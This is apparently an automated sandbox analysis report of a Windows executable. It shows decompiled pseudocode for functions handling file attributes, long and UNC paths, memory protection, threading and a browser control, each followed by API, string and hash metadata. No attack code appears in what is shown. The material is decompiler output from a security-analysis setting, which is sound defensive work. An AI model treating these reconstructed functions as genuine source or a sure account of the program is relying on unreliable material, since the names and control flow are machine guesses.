							E00C3399D(_t81, _t99);
							_t90 = _t108 - 0x60c4;
						}
						_t61 = E00C3946E(_t90);
					} else {
						E00C36BF5(_t113, 0x53, _t81 + 0x1e, _t106);
						_t61 = E00C36E03(0xc700e0, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t61;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E00C3FAB1(_t108 - 0x1010, 0xc62490, 0x802);
					E00C3FA89(_t112, _t108 - 0x1010, _t106, 0x802);
					goto L4;
				}
			}















                                            0x00c37570
                                            0x00c37575
                                            0x00c3757f
                                            0x00c37586
                                            0x00c3758f
                                            0x00c375be
                                            0x00c375be
                                            0x00c375cc
                                            0x00c375d1
                                            0x00c375d1
                                            0x00c375e1
                                            0x00c375e6
                                            0x00c375ee
                                            0x00c3760d
                                            0x00c37611
                                            0x00c3764e
                                            0x00c37659
                                            0x00c37666
                                            0x00c37669
                                            0x00c3766e
                                            0x00c37674
                                            0x00c37677
                                            0x00c3767a
                                            0x00c3767c
                                            0x00c37681
                                            0x00c37681
                                            0x00c3768c
                                            0x00c37699
                                            0x00c376a7
                                            0x00c376ac
                                            0x00c376ae
                                            0x00c376b0
                                            0x00c376b9
                                            0x00c376ba
                                            0x00c376bb
                                            0x00c376c0
                                            0x00c376c2
                                            0x00c376ca
                                            0x00c376ca
                                            0x00c376c2
                                            0x00c376d5
                                            0x00c376da
                                            0x00c376de
                                            0x00c376e2
                                            0x00c376ed
                                            0x00c376f2
                                            0x00c376f4
                                            0x00c37711
                                            0x00c37711
                                            0x00c376f4
                                            0x00c3771e
                                            0x00c37729
                                            0x00c3772e
                                            0x00c37613
                                            0x00c37619
                                            0x00c3761e
                                            0x00c37628
                                            0x00c37629
                                            0x00c3762c
                                            0x00c3762f
                                            0x00c37634
                                            0x00c37634
                                            0x00c37734
                                            0x00c375f0
                                            0x00c375f7
                                            0x00c37603
                                            0x00c37603
                                            0x00c3773f
                                            0x00c37749
                                            0x00c37749
                                            0x00c37591
                                            0x00c37595
                                            0x00000000
                                            0x00c37597
                                            0x00c37597
                                            0x00c375a9
                                            0x00c375b7
                                            0x00000000
                                            0x00c375b7

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00C37575
                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C37711
                                              • Part of subcall function 00C3A12F: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00C39F65,?,?,?,00C39DFE,?,00000001,00000000,?,?), ref: 00C3A143
                                              • Part of subcall function 00C3A12F: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C39F65,?,?,?,00C39DFE,?,00000001,00000000,?,?), ref: 00C3A174
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$Attributes$H_prologTime
                                            • String ID: :
                                            • API String ID: 1861295151-336475711
                                            • Opcode ID: dce2484ee408caa99c0953723a969d8aaca1923593d997f5710a8d82a0928e3e
                                            • Instruction ID: d10fcb7fdb75a6bb0b8f98b65b553da5eabddca24527521a342422c929fab515
                                            • Opcode Fuzzy Hash: dce2484ee408caa99c0953723a969d8aaca1923593d997f5710a8d82a0928e3e
                                            • Instruction Fuzzy Hash: D441BFB1914218AADB35EB60CC56EEE777CEF45300F0041A9B549A2092DB705F89EFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3B32C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 81%
                                            			E00C3B32C(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E00C4D940();
				_t71 = _a4;
				if( *_t71 != 0) {
					E00C3B4C6(_t71);
					_t66 = E00C52B33(_t71);
					_t30 = E00C3B4F2(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E00C3B5CD( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E00C3AEA5(__eflags,  &_v4100, 0x800);
							_t39 = E00C52B33( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E00C3FAB1(_a8, L"\\\\?\\", _t69);
							E00C3FA89(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E00C3B5CD(_t71[1] & 0x0000ffff);
								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E00C3FA89(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E00C3FAB1(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E00C3FA89(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E00C3B4C6(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E00C3FAB1(_a8, L"\\\\?\\", _t73);
						E00C3FA89(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E00C3FAB1(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}
















                                            0x00c3b334
                                            0x00c3b33a
                                            0x00c3b341
                                            0x00c3b34d
                                            0x00c3b35a
                                            0x00c3b35c
                                            0x00c3b361
                                            0x00c3b363
                                            0x00c3b3e9
                                            0x00c3b3ef
                                            0x00c3b3f1
                                            0x00c3b4b0
                                            0x00c3b4b0
                                            0x00c3b4b0
                                            0x00c3b4b2
                                            0x00000000
                                            0x00c3b4b3
                                            0x00c3b3f7
                                            0x00c3b3f9
                                            0x00000000
                                            0x00000000
                                            0x00c3b408
                                            0x00c3b40a
                                            0x00c3b44f
                                            0x00c3b45b
                                            0x00c3b465
                                            0x00c3b469
                                            0x00c3b46b
                                            0x00000000
                                            0x00000000
                                            0x00c3b476
                                            0x00c3b486
                                            0x00c3b48b
                                            0x00c3b48f
                                            0x00c3b49b
                                            0x00c3b49d
                                            0x00c3b49f
                                            0x00c3b49f
                                            0x00c3b49f
                                            0x00c3b49d
                                            0x00c3b4a2
                                            0x00c3b4a2
                                            0x00c3b4a3
                                            0x00c3b4a3
                                            0x00c3b4a4
                                            0x00c3b4a4
                                            0x00c3b4a7
                                            0x00c3b4ac
                                            0x00000000
                                            0x00c3b4ac
                                            0x00c3b40c
                                            0x00c3b40f
                                            0x00c3b412
                                            0x00c3b414
                                            0x00000000
                                            0x00000000
                                            0x00c3b423
                                            0x00c3b42a
                                            0x00c3b43c
                                            0x00000000
                                            0x00c3b43c
                                            0x00c3b366
                                            0x00c3b36b
                                            0x00c3b36d
                                            0x00c3b395
                                            0x00c3b396
                                            0x00c3b399
                                            0x00000000
                                            0x00000000
                                            0x00c3b39f
                                            0x00c3b3a2
                                            0x00c3b3a5
                                            0x00000000
                                            0x00000000
                                            0x00c3b3ab
                                            0x00c3b3ae
                                            0x00c3b3b1
                                            0x00c3b3b3
                                            0x00000000
                                            0x00000000
                                            0x00c3b3c2
                                            0x00c3b3d0
                                            0x00c3b3d5
                                            0x00c3b3d6
                                            0x00000000
                                            0x00c3b3d6
                                            0x00c3b36f
                                            0x00c3b372
                                            0x00c3b375
                                            0x00000000
                                            0x00000000
                                            0x00c3b386
                                            0x00c3b38b
                                            0x00000000
                                            0x00c3b343
                                            0x00c3b343
                                            0x00c3b4b4
                                            0x00c3b4b8
                                            0x00c3b4b8

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID: UNC$\\?\
                                            • API String ID: 0-253988292
                                            • Opcode ID: 99d2167c08e7d2eee0af9a8cbf5eb42dcaed5f1e3b79be65a273a2bb30480af1
                                            • Instruction ID: ecdf8598a2025b63ffc615a1340792cf6f535f3d1189dbf6992b15823bac488f
                                            • Opcode Fuzzy Hash: 99d2167c08e7d2eee0af9a8cbf5eb42dcaed5f1e3b79be65a273a2bb30480af1
                                            • Instruction Fuzzy Hash: 8741E731824218BACF20FF61CC41EEF77A9AF05751F008465FA69A3152DB74DE91EBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C48A07, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 70%
                                            			E00C48A07(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				void* __esi;
				intOrPtr _t18;
				char _t19;
				intOrPtr* _t23;
				signed int _t25;
				void* _t26;
				intOrPtr* _t28;
				void* _t38;
				void* _t43;
				intOrPtr _t44;
				signed int* _t48;

				_t44 = _a4;
				_t43 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = _t44;
				_t18 = E00C4D82C(__edx, _t44, __eflags, 0x30);
				_a4 = _t18;
				if(_t18 == 0) {
					_t19 = 0;
					__eflags = 0;
				} else {
					_t19 = E00C483B5(_t18);
				}
				 *((intOrPtr*)(_t43 + 0xc)) = _t19;
				if(_t19 == 0) {
					return _t19;
				} else {
					 *((intOrPtr*)(_t19 + 0x18)) = _t44;
					E00C49184( *((intOrPtr*)(_t43 + 0xc)), L"Shell.Explorer");
					E00C4931D( *((intOrPtr*)(_t43 + 0xc)), 1);
					E00C492D3( *((intOrPtr*)(_t43 + 0xc)), 1);
					_t23 = E00C49238( *((intOrPtr*)(_t43 + 0xc)));
					_t28 = _t23;
					if(_t28 == 0) {
						L7:
						__eflags =  *(_t43 + 0x10);
						if( *(_t43 + 0x10) != 0) {
							E00C48581(_t43);
							_t25 =  *(_t43 + 0x10);
							_push(0);
							_push(0);
							_push(0);
							 *((char*)(_t43 + 0x25)) = 0;
							_t38 =  *_t25;
							_push(0);
							__eflags =  *(_t43 + 0x20);
							if( *(_t43 + 0x20) == 0) {
								_push(L"about:blank");
							} else {
								_push( *(_t43 + 0x20));
							}
							_t23 =  *((intOrPtr*)(_t38 + 0x2c))(_t25);
						}
						L12:
						return _t23;
					}
					_t10 = _t43 + 0x10; // 0x10
					_t48 = _t10;
					_t26 =  *((intOrPtr*)( *_t28))(_t28, 0xc6412c, _t48);
					_t23 =  *((intOrPtr*)( *_t28 + 8))(_t28);
					if(_t26 >= 0) {
						goto L7;
					}
					 *_t48 =  *_t48 & 0x00000000;
					goto L12;
				}
			}














                                            0x00c48a08
                                            0x00c48a0d
                                            0x00c48a11
                                            0x00c48a14
                                            0x00c48a19
                                            0x00c48a20
                                            0x00c48a2b
                                            0x00c48a2b
                                            0x00c48a22
                                            0x00c48a24
                                            0x00c48a24
                                            0x00c48a2d
                                            0x00c48a32
                                            0x00c48abd
                                            0x00c48a38
                                            0x00c48a3a
                                            0x00c48a45
                                            0x00c48a4f
                                            0x00c48a59
                                            0x00c48a61
                                            0x00c48a66
                                            0x00c48a6a
                                            0x00c48a8c
                                            0x00c48a8e
                                            0x00c48a91
                                            0x00c48a95
                                            0x00c48a9a
                                            0x00c48a9d
                                            0x00c48a9e
                                            0x00c48a9f
                                            0x00c48aa0
                                            0x00c48aa3
                                            0x00c48aa5
                                            0x00c48aa6
                                            0x00c48aa9
                                            0x00c48ab0
                                            0x00c48aab
                                            0x00c48aab
                                            0x00c48aab
                                            0x00c48ab6
                                            0x00c48ab6
                                            0x00c48ab9
                                            0x00000000
                                            0x00c48aba
                                            0x00c48a6e
                                            0x00c48a6e
                                            0x00c48a78
                                            0x00c48a7f
                                            0x00c48a84
                                            0x00000000
                                            0x00000000
                                            0x00c48a86
                                            0x00000000
                                            0x00c48a86

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID: Shell.Explorer$about:blank
                                            • API String ID: 0-874089819
                                            • Opcode ID: d17dfe8e0e2f9439c289d048814742649f417a6452aadca1c8637fa496848570
                                            • Instruction ID: aaa581867d2b514ba847cffa2098ca55dbf9b824c94b87a8bf237ef4f3ac5825
                                            • Opcode Fuzzy Hash: d17dfe8e0e2f9439c289d048814742649f417a6452aadca1c8637fa496848570
                                            • Instruction Fuzzy Hash: F8218171700616BFD714EFB0C891E2EB7A8FF45710B04822AF2158B682DFB0E959DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3E862, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 20%
                                            			E00C3E862(void* __ebx, void* __edi, intOrPtr _a4, signed int _a8, char _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				intOrPtr* _t11;
				intOrPtr* _t12;
				signed char _t13;
				void* _t17;
				signed char _t18;
				void* _t20;
				signed int _t22;
				signed int _t30;
				void* _t31;
				void* _t32;
				intOrPtr _t33;
				signed int _t36;

				_t32 = __edi;
				_t17 = __ebx;
				_t11 =  *0xc77358; // 0x0
				if(_t11 == 0) {
					E00C3E7E3(0xc77350);
					_t11 =  *0xc77358; // 0x0
				}
				_t36 = _a8;
				_t22 = _t36 & 0xfffffff0;
				_t30 = 0 | _a16 != 0x00000000;
				if(_a12 == 0) {
					_t12 =  *0xc7735c; // 0x0
					if(_t12 == 0) {
						goto L10;
					} else {
						_t13 =  *_t12(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptUnprotectMemory failed");
							goto L6;
						}
					}
				} else {
					if(_t11 == 0) {
						L10:
						_push(_t17);
						_t13 = GetCurrentProcessId();
						_t31 = 0;
						_t18 = _t13;
						if(_t36 != 0) {
							_push(_t32);
							_t33 = _a4;
							_t20 = _t18 + 0x4b;
							do {
								_t13 = _t31 + _t20;
								 *(_t31 + _t33) =  *(_t31 + _t33) ^ _t13;
								_t31 = _t31 + 1;
							} while (_t31 < _t36);
						}
					} else {
						_t13 =  *_t11(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptProtectMemory failed");
							L6:
							_push(0xc700e0);
							_t13 = E00C36CC9(E00C4E214(E00C36CCE(_t22)), 0xc700e0, 0xc700e0, 2);
						}
					}
				}
				return _t13;
			}

















                                            0x00c3e862
                                            0x00c3e862
                                            0x00c3e865
                                            0x00c3e86c
                                            0x00c3e873
                                            0x00c3e878
                                            0x00c3e878
                                            0x00c3e87e
                                            0x00c3e885
                                            0x00c3e88b
                                            0x00c3e892
                                            0x00c3e8c7
                                            0x00c3e8ce
                                            0x00000000
                                            0x00c3e8d0
                                            0x00c3e8d5
                                            0x00c3e8d9
                                            0x00c3e8db
                                            0x00000000
                                            0x00c3e8db
                                            0x00c3e8d9
                                            0x00c3e894
                                            0x00c3e896
                                            0x00c3e8e2
                                            0x00c3e8e2
                                            0x00c3e8e3
                                            0x00c3e8e9
                                            0x00c3e8eb
                                            0x00c3e8ef
                                            0x00c3e8f1
                                            0x00c3e8f2
                                            0x00c3e8f5
                                            0x00c3e8f8
                                            0x00c3e8fb
                                            0x00c3e8fe
                                            0x00c3e900
                                            0x00c3e901
                                            0x00c3e905
                                            0x00c3e898
                                            0x00c3e89d
                                            0x00c3e8a1
                                            0x00c3e8a3
                                            0x00c3e8a8
                                            0x00c3e8ad
                                            0x00c3e8c0
                                            0x00c3e8c0
                                            0x00c3e8a1
                                            0x00c3e896
                                            0x00c3e909

                                            APIs
                                              • Part of subcall function 00C3E7E3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00C3E802
                                              • Part of subcall function 00C3E7E3: GetProcAddress.KERNEL32(00C77350,CryptUnprotectMemory), ref: 00C3E812
                                            • GetCurrentProcessId.KERNEL32(?,?,?,00C3E85C), ref: 00C3E8E3
                                            Strings
                                            • CryptProtectMemory failed, xrefs: 00C3E8A3
                                            • CryptUnprotectMemory failed, xrefs: 00C3E8DB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressProc$CurrentProcess
                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                            • API String ID: 2190909847-396321323
                                            • Opcode ID: 8adc5927c550cf9492d7427c7a59a854c9db6b095af90488b37343f07743dd37
                                            • Instruction ID: 5edf94e4899e98e151e539b8e0c91bc8fdbd40e7ce351c5d81f461b9a5cb152a
                                            • Opcode Fuzzy Hash: 8adc5927c550cf9492d7427c7a59a854c9db6b095af90488b37343f07743dd37
                                            • Instruction Fuzzy Hash: 1F113630B147196BEB11AB3DDC41BFE7789EF84B54F088139F8149A1E2EB61DE41A391
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C404F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 70%
                                            			E00C404F5() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0xc700e0 > 0) {
					_t18 = 0xc700e4;
					do {
						_t22 = CreateThread(0, 0x10000, E00C4062F, 0xc700e0, 0,  &_v4);
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0xc700e0);
							E00C36CC9(E00C4E214(E00C36CCE(0xc700e0)), 0xc700e0, 0xc700e0, 2);
						}
						 *_t18 = _t22;
						 *0x00C701E4 =  *((intOrPtr*)(0xc701e4)) + 1;
						_t8 =  *0xc77368; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0xc700e0);
					return _t8;
				}
				return _t5;
			}












                                            0x00c404fa
                                            0x00c404fe
                                            0x00c40502
                                            0x00c40505
                                            0x00c4051f
                                            0x00c40523
                                            0x00c40525
                                            0x00c4052a
                                            0x00c40547
                                            0x00c40547
                                            0x00c4054c
                                            0x00c4054e
                                            0x00c40554
                                            0x00c4055b
                                            0x00c40560
                                            0x00c40560
                                            0x00c40566
                                            0x00c40567
                                            0x00c4056a
                                            0x00000000
                                            0x00c4056f
                                            0x00c40573

                                            APIs
                                            • CreateThread.KERNEL32 ref: 00C40519
                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 00C40560
                                              • Part of subcall function 00C36CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C36CEC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                            • String ID: CreateThread failed
                                            • API String ID: 2655393344-3849766595
                                            • Opcode ID: 6b0689950a015a5accf5003d8a6f0380018f28c44e72b8bdfc9281b8f1bf5474
                                            • Instruction ID: e828a986c658047f7159ab0e633fa8702ab5b02f5d29e1112fce70484e2eaa6c
                                            • Opcode Fuzzy Hash: 6b0689950a015a5accf5003d8a6f0380018f28c44e72b8bdfc9281b8f1bf5474
                                            • Instruction Fuzzy Hash: 3C01D6B1384305ABD7247F55AC81BAA77A8FB44761F30403DF68AA2181CAF169859B24
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C312D7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E00C312D7(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E00C3D6E4(0xc70078, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E00C3D70B(0xc70078, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0xc6dfd4(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0xc622e4);
								}
							}
						}
					}
				}
				return 0;
			}





                                            0x00c312de
                                            0x00c31341
                                            0x00c312e0
                                            0x00c312e0
                                            0x00c312e7
                                            0x00c312fd
                                            0x00c31306
                                            0x00c3130b
                                            0x00c31313
                                            0x00c3131b
                                            0x00c31323
                                            0x00c31331
                                            0x00c31331
                                            0x00c31323
                                            0x00c31313
                                            0x00c31306
                                            0x00c312e7
                                            0x00c31349

                                            APIs
                                              • Part of subcall function 00C3D70B: _swprintf.LIBCMT ref: 00C3D731
                                              • Part of subcall function 00C3D70B: _strlen.LIBCMT ref: 00C3D752
                                              • Part of subcall function 00C3D70B: SetDlgItemTextW.USER32(?,00C6D154,?), ref: 00C3D7B2
                                              • Part of subcall function 00C3D70B: GetWindowRect.USER32(?,?), ref: 00C3D7EC
                                              • Part of subcall function 00C3D70B: GetClientRect.USER32(?,?), ref: 00C3D7F8
                                            • GetDlgItem.USER32(00000000,00003021), ref: 00C3131B
                                            • SetWindowTextW.USER32(00000000,00C622E4), ref: 00C31331
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                            • String ID: 0
                                            • API String ID: 2622349952-4108050209
                                            • Opcode ID: 5a883ccc41dc2d868e1af030b1827e5a6e4cebe04fecb413c85c7187985e9a2e
                                            • Instruction ID: 5a16e146819aa50b2c546cdd82ad4e0bff694d734b5e7b0581f4ed327b3eb98d
                                            • Opcode Fuzzy Hash: 5a883ccc41dc2d868e1af030b1827e5a6e4cebe04fecb413c85c7187985e9a2e
                                            • Instruction Fuzzy Hash: 2DF0C2B0590248AFDF650F629C49BED3F99AF04354F088414FC9A914B1CBB8CA90EB10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C404BA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E00C404BA(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E00C36CC9(E00C36CCE(_t6, 0xc700e0, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0xc700e0, 0xc700e0, 2);
				}
				return _t2;
			}






                                            0x00c404ba
                                            0x00c404c0
                                            0x00c404c9
                                            0x00c404d2
                                            0x00000000
                                            0x00c404f1
                                            0x00c404f2

                                            APIs
                                            • WaitForSingleObject.KERNEL32(?,000000FF,00C406CE,?), ref: 00C404C0
                                            • GetLastError.KERNEL32(?), ref: 00C404CC
                                              • Part of subcall function 00C36CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C36CEC
                                            Strings
                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00C404D5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                            • API String ID: 1091760877-2248577382
                                            • Opcode ID: 1e23978741f3c3875367282f5e8ef6f51166c707c626b02165ac3a55ee404f96
                                            • Instruction ID: c64df1e37afeb3e34a817daf04fdc018832f43c71ab2160d59d100d3fdc68e54
                                            • Opcode Fuzzy Hash: 1e23978741f3c3875367282f5e8ef6f51166c707c626b02165ac3a55ee404f96
                                            • Instruction Fuzzy Hash: 28D05E7154983177DA2137286C0AFAEB919EB12334F60C728F679A52E6CA600D9292D6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3D6C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C3D6C1(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}





                                            0x00c3d6c4
                                            0x00c3d6d4
                                            0x00c3d6dc
                                            0x00c3d6de
                                            0x00000000
                                            0x00c3d6de
                                            0x00c3d6e3

                                            APIs
